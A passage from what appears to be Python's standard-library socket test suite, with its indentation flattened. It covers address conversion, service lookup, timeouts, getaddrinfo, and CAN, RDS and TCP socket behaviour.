self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htonl, k)
self.assertRaises(OverflowError, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:')
assertInvalid('1:2:3:4:5:6:7:8:0')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup choses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not stricly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_uknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, _ = tempfile.mkstemp()
with socket.socket(family=42424, type=13331, fileno=fd) as s:
self.assertEqual(s.family, 42424)
self.assertEqual(s.type, 13331)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
self.assertEqual(cm.exception.errno, errno.ENOBUFS)
# and we should have received a congestion notification through poll
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
